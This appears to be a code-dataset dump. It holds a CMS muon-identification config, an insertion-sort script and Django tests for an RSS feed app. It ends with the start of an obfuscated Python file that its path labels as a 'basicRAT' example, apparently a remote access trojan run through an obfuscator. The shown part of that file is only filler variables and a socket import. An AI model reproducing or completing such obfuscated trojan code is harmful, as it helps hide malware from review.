debugWithTruthMatching = cms.bool(False),
ecalDepositName = cms.string('ecal'),
fillCaloCompatibility = cms.bool(False),
fillEnergy = cms.bool(False),
fillGlobalTrackQuality = cms.bool(False),
fillGlobalTrackRefits = cms.bool(False),
fillIsolation = cms.bool(False),
fillMatching = cms.bool(True),
fillTrackerKink = cms.bool(False),
globalTrackQualityInputTag = cms.InputTag(""),
hcalDepositName = cms.string('hcal'),
hoDepositName = cms.string('ho'),
inputCollectionLabels = cms.VInputTag("hltPhase2L3MuonMerged", "hltPhase2L3GlbMuon", "hltL2MuonsFromL1TkMuon:UpdatedAtVtx"),
inputCollectionTypes = cms.vstring(
'inner tracks',
'links',
'outer tracks'
),
jetDepositName = cms.string('jets'),
maxAbsDx = cms.double(3.0),
maxAbsDy = cms.double(9999.0),
maxAbsEta = cms.double(3.0),
maxAbsPullX = cms.double(4.0),
maxAbsPullY = cms.double(9999.0),
minCaloCompatibility = cms.double(0.6),
minNumberOfMatches = cms.int32(1),
minP = cms.double(0.0),
minPCaloMuon = cms.double(1000000000.0),
minPt = cms.double(2.0),
ptThresholdToFillCandidateP4WithGlobalFit = cms.double(200.0),
runArbitrationCleaner = cms.bool(False),
sigmaThresholdToFillCandidateP4WithGlobalFit = cms.double(2.0),
trackDepositName = cms.string('tracker'),
writeIsoDeposits = cms.bool(False)
)
| 43.794872 | 128 | 0.610572 | import FWCore.ParameterSet.Config as cms
hltPhase2L3MuonsNoID = cms.EDProducer("MuonIdProducer",
CaloExtractorPSet = cms.PSet(
CenterConeOnCalIntersection = cms.bool(False),
ComponentName = cms.string('CaloExtractorByAssociator'),
DR_Max = cms.double(1.0),
DR_Veto_E = cms.double(0.07),
DR_Veto_H = cms.double(0.1),
DR_Veto_HO = cms.double(0.1),
DepositInstanceLabels = cms.vstring(
'ecal',
'hcal',
'ho'
),
DepositLabel = cms.untracked.string('Cal'),
NoiseTow_EB = cms.double(0.04),
NoiseTow_EE = cms.double(0.15),
Noise_EB = cms.double(0.025),
Noise_EE = cms.double(0.1),
Noise_HB = cms.double(0.2),
Noise_HE = cms.double(0.2),
Noise_HO = cms.double(0.2),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold_E = cms.double(0.2),
Threshold_H = cms.double(0.5),
Threshold_HO = cms.double(0.5),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(1.0),
dREcalPreselection = cms.double(1.0),
dRHcal = cms.double(1.0),
dRHcalPreselection = cms.double(1.0),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
),
UseRecHitsFlag = cms.bool(False)
),
JetExtractorPSet = cms.PSet(
ComponentName = cms.string('JetExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.1),
ExcludeMuonVeto = cms.bool(True),
JetCollectionLabel = cms.InputTag("Notused"),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold = cms.double(5.0),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(0.5),
dREcalPreselection = cms.double(0.5),
dRHcal = cms.double(0.5),
dRHcalPreselection = cms.double(0.5),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
)
),
MuonCaloCompatibility = cms.PSet(
MuonTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_muons_lowPt_3_1_norm.root'),
PionTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_pions_lowPt_3_1_norm.root'),
allSiPMHO = cms.bool(False),
delta_eta = cms.double(0.02),
delta_phi = cms.double(0.02)
),
TimingFillerParameters = cms.PSet(
CSCTimingParameters = cms.PSet(
CSCStripError = cms.double(7.0),
CSCStripTimeOffset = cms.double(0.0),
CSCTimeOffset = cms.double(0.0),
CSCWireError = cms.double(8.6),
CSCWireTimeOffset = cms.double(0.0),
CSCsegments = cms.InputTag("hltCscSegments"),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(100.0),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseStripTime = cms.bool(True),
UseWireTime = cms.bool(True),
debug = cms.bool(False)
),
DTTimingParameters = cms.PSet(
DTTimeOffset = cms.double(2.7),
DTsegments = cms.InputTag("hltDt4DSegments"),
DoWireCorr = cms.bool(False),
DropTheta = cms.bool(True),
HitError = cms.double(6.0),
HitsMin = cms.int32(5),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(10000.0),
RequireBothProjections = cms.bool(False),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseSegmentT0 = cms.bool(False),
debug = cms.bool(False)
),
EcalEnergyCut = cms.double(0.4),
ErrorCSC = cms.double(7.4),
ErrorDT = cms.double(6.0),
ErrorEB = cms.double(2.085),
ErrorEE = cms.double(6.95),
UseCSC = cms.bool(True),
UseDT = cms.bool(True),
UseECAL = cms.bool(True)
),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
GEMSegmentCollectionLabel = cms.InputTag("hltGemSegments"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
ME0SegmentCollectionLabel = cms.InputTag("hltMe0Segments"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(9999.0),
dREcalPreselection = cms.double(0.05),
dRHcal = cms.double(9999.0),
dRHcalPreselection = cms.double(0.2),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(False),
useEcal = cms.bool(False),
useGEM = cms.bool(True),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useME0 = cms.bool(False),
# useME0 = cms.bool(True), ### Thiago: in the offline RECO it is false...
useMuon = cms.bool(True),
usePreshower = cms.bool(False)
),
TrackExtractorPSet = cms.PSet(
BeamSpotLabel = cms.InputTag("offlineBeamSpot"),
BeamlineOption = cms.string('BeamSpotFromEvent'),
Chi2Ndof_Max = cms.double(1e+64),
Chi2Prob_Min = cms.double(-1.0),
ComponentName = cms.string('TrackExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.01),
Diff_r = cms.double(0.1),
Diff_z = cms.double(0.2),
NHits_Min = cms.uint32(0),
Pt_Min = cms.double(-1.0),
inputTrackCollection = cms.InputTag("hltPhase2L3MuonMerged")
),
TrackerKinkFinderParameters = cms.PSet(
diagonalOnly = cms.bool(False),
usePosition = cms.bool(False)
),
addExtraSoftMuons = cms.bool(False),
arbitrateTrackerMuons = cms.bool(True),
arbitrationCleanerOptions = cms.PSet(
ClusterDPhi = cms.double(0.6),
ClusterDTheta = cms.double(0.02),
Clustering = cms.bool(True),
ME1a = cms.bool(True),
Overlap = cms.bool(True),
OverlapDPhi = cms.double(0.0786),
OverlapDTheta = cms.double(0.02)
),
debugWithTruthMatching = cms.bool(False),
ecalDepositName = cms.string('ecal'),
fillCaloCompatibility = cms.bool(False),
fillEnergy = cms.bool(False),
fillGlobalTrackQuality = cms.bool(False),
fillGlobalTrackRefits = cms.bool(False),
fillIsolation = cms.bool(False),
fillMatching = cms.bool(True),
fillTrackerKink = cms.bool(False),
globalTrackQualityInputTag = cms.InputTag(""),
hcalDepositName = cms.string('hcal'),
hoDepositName = cms.string('ho'),
inputCollectionLabels = cms.VInputTag("hltPhase2L3MuonMerged", "hltPhase2L3GlbMuon", "hltL2MuonsFromL1TkMuon:UpdatedAtVtx"),
inputCollectionTypes = cms.vstring(
'inner tracks',
'links',
'outer tracks'
),
jetDepositName = cms.string('jets'),
maxAbsDx = cms.double(3.0),
maxAbsDy = cms.double(9999.0),
maxAbsEta = cms.double(3.0),
maxAbsPullX = cms.double(4.0),
maxAbsPullY = cms.double(9999.0),
minCaloCompatibility = cms.double(0.6),
minNumberOfMatches = cms.int32(1),
minP = cms.double(0.0),
minPCaloMuon = cms.double(1000000000.0),
minPt = cms.double(2.0),
ptThresholdToFillCandidateP4WithGlobalFit = cms.double(200.0),
runArbitrationCleaner = cms.bool(False),
sigmaThresholdToFillCandidateP4WithGlobalFit = cms.double(2.0),
trackDepositName = cms.string('tracker'),
writeIsoDeposits = cms.bool(False)
)
| 0 | 0 | 0 |
932abde0780a030533a6b3666904bc58b1662fa8 | 754 | py | Python | 01. Searching & Sorting/Python files/Insertion_sort.py | Ansh-cell/Data-structure-Algorithms-using-Python | 2074bd1aece7ea95a8ae12bd3e4de8139711eba1 | [
"MIT"
] | 2 | 2021-07-06T21:27:33.000Z | 2021-08-24T14:28:34.000Z | 01. Searching & Sorting/Python files/Insertion_sort.py | Ansh-cell/Data-structure-Algorithms-using-Python | 2074bd1aece7ea95a8ae12bd3e4de8139711eba1 | [
"MIT"
] | null | null | null | 01. Searching & Sorting/Python files/Insertion_sort.py | Ansh-cell/Data-structure-Algorithms-using-Python | 2074bd1aece7ea95a8ae12bd3e4de8139711eba1 | [
"MIT"
] | null | null | null |
arr = [2, 4, 1, 2, 8, 3]
insertionSort(arr)
print(arr) | 47.125 | 108 | 0.600796 | def insertionSort(arr): # argument: (arr) --> arr = array / list
length = len(arr) # find the length of array
for i in range(1, length): # starting from 1st index till end
temp = arr[i] # store the value of ith index in temp so it can be access later
j = i - 1 # as we are starting from 1st index this j will have index of value before ith index
while (j >= 0 and arr[
j] > temp): # this will loop will run till j has index 0 and j element must be larger then temp
arr[j + 1] = arr[j] # move j element right side
j = j - 1 # take next j element from left side
arr[j + 1] = temp # add temp element to j + 1 index
arr = [2, 4, 1, 2, 8, 3]
insertionSort(arr)
print(arr) | 676 | 0 | 22 |
d5389c2ca4d0f76395925e219d955743ce469ed0 | 11,483 | py | Python | feeds/tests/test_models.py | ralphqq/rss-apifier | cd056654abf24fd178f1e5d8661cafcb3cc1236b | [
"MIT"
] | null | null | null | feeds/tests/test_models.py | ralphqq/rss-apifier | cd056654abf24fd178f1e5d8661cafcb3cc1236b | [
"MIT"
] | 5 | 2020-06-06T01:01:48.000Z | 2021-09-22T18:16:22.000Z | feeds/tests/test_models.py | ralphqq/rss-apifier | cd056654abf24fd178f1e5d8661cafcb3cc1236b | [
"MIT"
] | null | null | null | from unittest.mock import patch
from django.conf import settings
from django.db import IntegrityError
from django.test import TestCase
from feeds.tests.helpers import (
make_fake_feedparser_dict, make_feed_entries_list,
make_preprocessed_entries_list
)
from feeds.models import Entry, Feed
@patch('feeds.models.preprocess_feed_entry_item')
@patch('feeds.models.fetch_feedparser_dict')
| 38.023179 | 77 | 0.634764 | from unittest.mock import patch
from django.conf import settings
from django.db import IntegrityError
from django.test import TestCase
from feeds.tests.helpers import (
make_fake_feedparser_dict, make_feed_entries_list,
make_preprocessed_entries_list
)
from feeds.models import Entry, Feed
class FeedModelTest(TestCase):
def setUp(self):
self.feed_url = 'https://www.samplefeeds.com/rss' # fake URL
# Create and set a valid FeedParserDict object
# to be used or overridden in the tests
self.feedparser_dict = make_fake_feedparser_dict(self.feed_url)
# Patch the fetch_feedparser_dict utility function
patcher = patch(
'feeds.models.fetch_feedparser_dict',
return_value=self.feedparser_dict
)
self.mock_fetch_feedparser_dict = patcher.start()
# To ensure patch gets cleaned up during tearDown:
self.addCleanup(patcher.stop)
def test_feed_model_defaults(self):
feed = Feed()
self.assertEqual(feed.title, '')
self.assertEqual(feed.description, '')
self.assertEqual(feed.version, '')
def test_feed_save_method(self):
feed = Feed(link=self.feed_url)
feed.save()
new_feed = Feed.objects.get(link=self.feed_url)
self.assertEqual(Feed.objects.count(), 1)
self.assertEqual(
new_feed.title,
self.feedparser_dict.feed['title']
)
self.assertEqual(
new_feed.description,
self.feedparser_dict.feed['description']
)
self.assertEqual(new_feed.link, self.feed_url)
self.assertEqual(
new_feed.version,
self.feedparser_dict['version']
)
def test_create_method(self):
feed = Feed.objects.create(link=self.feed_url)
self.assertTrue(self.mock_fetch_feedparser_dict.called)
self.assertEqual(Feed.objects.count(), 1)
def test_updating_and_saving_existing_feed(self):
feed = Feed.objects.create(link=self.feed_url)
with patch.object(Feed, 'fetch_and_set_feed_details') as mock_fetch:
# Modify values for existing feed and
# test that feed initialization no longer takes place
my_feed = Feed.objects.get(link=feed.link)
my_feed.title = 'New title'
my_feed.description = 'New description'
my_feed.save()
self.assertFalse(mock_fetch.called)
# Test if changes took effect
this_feed = Feed.objects.get(link=feed.link)
self.assertEqual(this_feed.title, 'New title')
self.assertEqual(this_feed.description, 'New description')
self.assertEqual(Feed.objects.count(), 1)
def test_fetching_feed_details_method(self):
feed = Feed(link=self.feed_url) # Instantiate, not save
feed.fetch_and_set_feed_details() # initialize, nopt saved
self.assertEqual(Feed.objects.count(), 0)
self.assertEqual(feed.title, self.feedparser_dict.feed['title'])
self.assertEqual(
feed.description,
self.feedparser_dict.feed['description']
)
self.assertEqual(feed.version, self.feedparser_dict['version'])
def test_save_without_link_raises_error(self):
feed = Feed()
with self.assertRaises(TypeError):
feed.save()
self.assertEqual(Feed.objects.count(), 0)
self.assertFalse(self.mock_fetch_feedparser_dict.called)
def test_create_without_link_raises_error(self):
with self.assertRaises(TypeError):
feed = Feed.objects.create()
self.assertEqual(Feed.objects.count(), 0)
self.assertFalse(self.mock_fetch_feedparser_dict.called)
def test_duplicate_feed_url_raises_integrity_error(self):
feed = Feed.objects.create(link=self.feed_url)
with self.assertRaises(IntegrityError):
# Creating a new Feed object
# using a URL already in db
Feed.objects.create(link=self.feed_url)
def test_missing_feed_fields(self):
del self.feedparser_dict.feed['title']
del self.feedparser_dict.feed['description']
del self.feedparser_dict['version']
self.mock_fetch_feedparser_dict.return_value = self.feedparser_dict
feed = Feed.objects.create(link=self.feed_url)
self.assertEqual(feed.title, '')
self.assertEqual(feed.description, '')
self.assertEqual(feed.version, '')
def test_feed_fetching_errors_interrupts_save(self):
self.mock_fetch_feedparser_dict.side_effect = ValueError
with self.assertRaises(ValueError):
feed = Feed.objects.create(link=self.feed_url)
def test_fetching_details_without_link(self):
feed = Feed()
with self.assertRaises(TypeError):
feed.fetch_and_set_feed_details()
class EntryModelTest(TestCase):
def test_field_defaults(self):
entry = Entry.objects.create()
self.assertEqual(Entry.objects.count(), 1)
def test_back_reference(self):
# Create some feeds
feed_url1 = 'https://www.my-feeds.com/'
feed_url2 = 'https://www.my-feeds2.com/'
feed_url3 = 'https://www.my-feeds3.com/'
feed_dict1 = make_fake_feedparser_dict(feed_url1)
feed_dict2 = make_fake_feedparser_dict(feed_url2)
feed_dict3 = make_fake_feedparser_dict(feed_url3)
feed1 = None
feed2 = None
feed3 = None
with patch('feeds.models.fetch_feedparser_dict') as mock_feed:
mock_feed.side_effect = [feed_dict1, feed_dict2, feed_dict3]
feed1 = Feed.objects.create(link=feed_url1)
feed2 = Feed.objects.create(link=feed_url2)
feed3 = Feed.objects.create(link=feed_url3)
# Create an entry and assign to feeds 1 and 2
entry = Entry.objects.create()
feed1.entries.add(entry)
feed2.entries.add(entry)
self.assertEqual(entry.feeds.count(), 2)
self.assertIn(feed1, entry.feeds.all())
self.assertIn(feed2, entry.feeds.all())
self.assertNotIn(feed3, entry.feeds.all())
def test_unique_constraint_on_get_and_create(self):
link1 = 'https://www.newsfeeds.com/first.html'
link2 = 'https://www.newsfeeds.com/second.html'
# Create some parsed entries
entry1 = {
'link': link1,
'summary': 'Summary 1',
'title': 'Title 1'
}
entry2 = {
'link': link1, # Same link as entry1
'summary': 'Summary 1 [Updated]', # New summary, title
'title': 'Title 1 [Updated]'
}
entry3 = {
'link': link2,
'summary': 'Summary 3',
'title': 'Title 3'
}
# Create Entry objects
obj1 = Entry.objects.create(**entry1)
obj2, created2 = Entry.objects.get_or_create(
link=entry2['link'],
defaults={k: v for k, v in entry2.items() if k != 'link'}
)
obj3, created3 = Entry.objects.get_or_create(
link=entry3['link'],
defaults={k: v for k, v in entry3.items() if k != 'link'}
)
self.assertFalse(created2)
self.assertEqual(obj2.summary, entry1['summary'])
self.assertEqual(obj2.title, entry1['title'])
self.assertTrue(created3)
self.assertEqual(obj3.summary, entry3['summary'])
self.assertEqual(obj3.title, entry3['title'])
@patch('feeds.models.preprocess_feed_entry_item')
@patch('feeds.models.fetch_feedparser_dict')
class EntryProcessingAndSavingTest(TestCase):
def setUp(self):
# Create a feed
self.feed_url = 'https://www.my-feeds.com/'
self.total_entries = 30
self.feed_dict = make_fake_feedparser_dict(
feed_url=self.feed_url,
n_items=self.total_entries
)
self.feed = None
with patch('feeds.models.fetch_feedparser_dict') as mock_feed:
mock_feed.return_value = self.feed_dict
self.feed = Feed.objects.create(link=self.feed_url)
# Create list of processed entries
self.parsed_entries = make_preprocessed_entries_list(
n_items=self.total_entries,
feed_url=self.feed_url
)
def test_entries_processing_and_saving(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
mock_parse.side_effect = self.parsed_entries
res = self.feed.update_feed_entries()
self.assertEqual(self.feed.entries.count(), self.total_entries)
self.assertEqual(res, self.total_entries)
def test_errors_when_processing_entries(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
self.parsed_entries[2] = IntegrityError
self.parsed_entries[-1] = ValueError
mock_parse.side_effect = self.parsed_entries
res = self.feed.update_feed_entries()
self.assertEqual(self.feed.entries.count(), self.total_entries - 2)
self.assertEqual(res, self.total_entries - 2)
def test_parsing_existing_entries(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
# Save two entries
self.feed.entries.create(**self.parsed_entries[0])
self.feed.entries.create(**self.parsed_entries[-1])
# Exclude saved entries
mock_parse.side_effect = self.parsed_entries[1:-1]
res = self.feed.update_feed_entries()
self.assertEqual(res, self.total_entries - 2)
self.assertEqual(mock_parse.call_count, self.total_entries)
def test_old_entries_reached_limit(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
mock_parse.side_effect = self.parsed_entries
# Save all entries after the first 10 entries
new_entries = 10
for entry in self.parsed_entries[new_entries:]:
self.feed.entries.create(**entry)
res = self.feed.update_feed_entries()
self.assertEqual(res, new_entries)
self.assertEqual(
mock_parse.call_count,
new_entries + settings.MAX_SAVED_ENTRIES_COUNT
)
def test_parsing_unassociated_entries(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
mock_parse.side_effect = self.parsed_entries
# Save three entries
# with links that are in current feed
e1 = Entry.objects.create(**self.parsed_entries[0])
e2 = Entry.objects.create(**self.parsed_entries[14])
e3 = Entry.objects.create(**self.parsed_entries[-1])
# Save a fourth entry whose link is not
# in the current feed
e4 = Entry.objects.create(link='https://www.unrelated-feed.com/')
res = self.feed.update_feed_entries()
self.assertEqual(res, self.total_entries)
self.assertEqual(self.feed.entries.count(), self.total_entries)
self.assertIn(e1, self.feed.entries.all())
self.assertIn(e2, self.feed.entries.all())
self.assertIn(e3, self.feed.entries.all())
self.assertNotIn(e4, self.feed.entries.all())
| 10,342 | 43 | 682 |
469949c76743edf2d55f59e5b288ae57e2e866c5 | 70,296 | py | Python | intensio/examples/python/intermediate/output/basicRAT-example/ItAvGNeiuyvPMOGsZIzXIVBRyHPHRAwkpnsoyvPsfARqNqWfJInnIyGCFSGxjyC.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | 1 | 2020-02-25T10:54:44.000Z | 2020-02-25T10:54:44.000Z | intensio/examples/python/intermediate/output/basicRAT-example/ItAvGNeiuyvPMOGsZIzXIVBRyHPHRAwkpnsoyvPsfARqNqWfJInnIyGCFSGxjyC.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | null | null | null | intensio/examples/python/intermediate/output/basicRAT-example/ItAvGNeiuyvPMOGsZIzXIVBRyHPHRAwkpnsoyvPsfARqNqWfJInnIyGCFSGxjyC.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = 'RXLQksAGmIIuwhBJUptxVuytBrDBAdGQAQvkSrGtgiSFnGSZospnORAnCEZHCBz'
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = 'RICsbwNkCOqPrHxHGDwjHTJCAhHPGiRZSFzrFITzFLmZFDDAuBRtAxtkQzDUuGg'
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = 'RlQqIOyQNICOIGoFHqDFIoZQFOjWRBBARHSuPBDyRvrvGqgYJtvxYSWSrSGIwqI'
tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ = 'RqOFwYDPEAExFHFSmzQJjkJwExAoABQCZvXSSrCfLCalJEExvIAOzHERyvxzAVy'
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = 'CHImoEVySFSFEvkpOyAmuzBNCzwASPrsQCsCqnzOwSyGyHpRGNGJASuGjFGVQXn'
HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt = 'JGBDRuMQPHYBSFQzFDEGITFTjtPFPFuEXhsHJQGRQwvQPSwxoqXECqQqVPICHwk'
if FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF != tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt != xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS
else:
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
if xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg == FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt == xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
# -*- coding: utf-8 -*-
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
if AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ != GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi:
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
import socket
